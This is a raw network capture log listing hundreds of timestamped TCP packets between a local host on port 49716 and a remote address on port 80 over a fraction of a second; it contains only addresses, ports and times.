                                                  Nov 28, 2024 13:12:12.386476040 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.386518955 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.389121056 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.389177084 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.389251947 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.389295101 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.391917944 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.391962051 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.392118931 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.392163992 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.394663095 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.394711018 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.394778967 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.394823074 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.397407055 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.397456884 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.397479057 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.397522926 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.400202990 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.400249004 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.400295973 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.400340080 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.402961016 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.403002024 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.403089046 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.403131962 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.405766010 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.405807972 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.405955076 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.405997992 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.408535957 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.408581972 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.408761024 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.408802986 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.411319971 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.411366940 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.411403894 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.411446095 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.414087057 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.414138079 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.414184093 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.414227962 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.416835070 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.416877985 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.416912079 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.416953087 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.419655085 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.419699907 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.419804096 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.419851065 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.422348022 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.422395945 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.422444105 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.422487974 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.425158024 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.425204039 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.425204992 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.425247908 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.427975893 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.428020954 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.428025007 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.428076029 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.430774927 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.430825949 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.430860996 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.430905104 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.433504105 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.433547020 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.433695078 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.433738947 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.436269999 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.436316013 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.436403036 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.436451912 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.439070940 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.439117908 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.439163923 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.439208984 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.441807985 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.441862106 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.441864014 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.441905975 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.444591999 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.444654942 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.444679976 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.444716930 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.447459936 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.447525024 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.447535038 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.447556973 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.450143099 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.450205088 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.450231075 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.450273991 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.452868938 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.452913046 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.453057051 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.453108072 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.455720901 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.455765963 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.455811024 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.455857992 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.527879953 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.527950048 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.527992010 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.528034925 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.528893948 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.528958082 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.528960943 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.529006004 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.531018972 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.531069040 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.531105995 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.531153917 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.533067942 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.533117056 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.533190012 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.533236027 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.535108089 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.535156012 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.535170078 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.535216093 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.537146091 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.537193060 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.537342072 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.537388086 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.539164066 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.539211988 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.539256096 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.539305925 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.541120052 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.541191101 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.541234970 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.541282892 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.543097019 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.543143034 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.543207884 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.543253899 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.545090914 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.545136929 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.545180082 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.545226097 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.547050953 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.547099113 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.547136068 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.547182083 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.549031973 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.549077988 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.549088001 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.549134016 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.550832987 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.550880909 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.550924063 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.550970078 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.552721977 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.552772045 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.552870989 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.552916050 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.554483891 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.554527998 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.554609060 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.554656029 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.556365967 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.556408882 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.556416988 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.556466103 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.558171034 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.558217049 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.558352947 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.558398962 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.559959888 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.560009003 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.560110092 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.560158014 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.561788082 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.561834097 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.561891079 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.561939001 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.563524008 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.563571930 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.563644886 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.563688993 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.565387011 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.565434933 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.565521002 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.565566063 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.567055941 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.567101955 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.567145109 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.567190886 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.568814993 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.568870068 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.568871021 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.568916082 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.570523977 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.570571899 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.570652962 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.570704937 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.572279930 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.572334051 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.572338104 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.572381973 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.574024916 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.574078083 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.574172974 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.574218035 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.575716972 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.575761080 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.575865030 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.575908899 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.577591896 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.577636957 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.577680111 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.577728033 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.578377962 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.578423977 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.578466892 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.578511953 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.579283953 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.579332113 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.579404116 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.579451084 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.580326080 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.580373049 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.580426931 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.580471992 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.581240892 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.581285954 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.581343889 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.581399918 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.582302094 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.582348108 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.582384109 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.582427979 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.583184958 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.583247900 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.583262920 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.583311081 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.584178925 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.584228039 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.584271908 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.584321976 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.585135937 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.585181952 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.585279942 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.585324049 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.586231947 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.586280107 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.586291075 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.586339951 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.587078094 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.587126017 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.587196112 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.587239981 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.588061094 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.588107109 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.588192940 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.588238001 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.589030981 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.589077950 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.589133978 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.589181900 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.590037107 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.590090990 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.590131044 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.590177059 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.591094017 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.591139078 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.591141939 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.591176033 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.591968060 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.592015982 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.592053890 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.592099905 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.593056917 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.593103886 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.593152046 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.593200922 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.594093084 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.594137907 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.594162941 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.594208956 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.594969988 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.595016956 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.595110893 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.595155954 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.596106052 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.596153975 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.596193075 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.596240997 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.597412109 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.597457886 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.597589016 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.597630024 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.598308086 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.598352909 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.598423958 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.598467112 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.599175930 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.599222898 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.599363089 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.599407911 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.600028038 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.600075006 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.600136995 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.600183010 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.600815058 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.600862026 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.600882053 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.600934029 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.601671934 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.601721048 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.729357004 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.729418039 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.729445934 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.729475021 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.729697943 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.729748964 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.729789019 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.729835033 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.730674982 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.730720043 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.730750084 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.730798006 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.731656075 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.731703997 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.731736898 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.731781960 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.732654095 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.732706070 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.732745886 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.732795954 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.733644009 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.733695984 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.733742952 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.733788013 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.734561920 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.734608889 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.734627008 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.734672070 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.735584021 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.735634089 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.735661983 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.735707045 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.736577034 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.736623049 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.736655951 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.736701965 CET4971680192.168.2.831.41.244.11
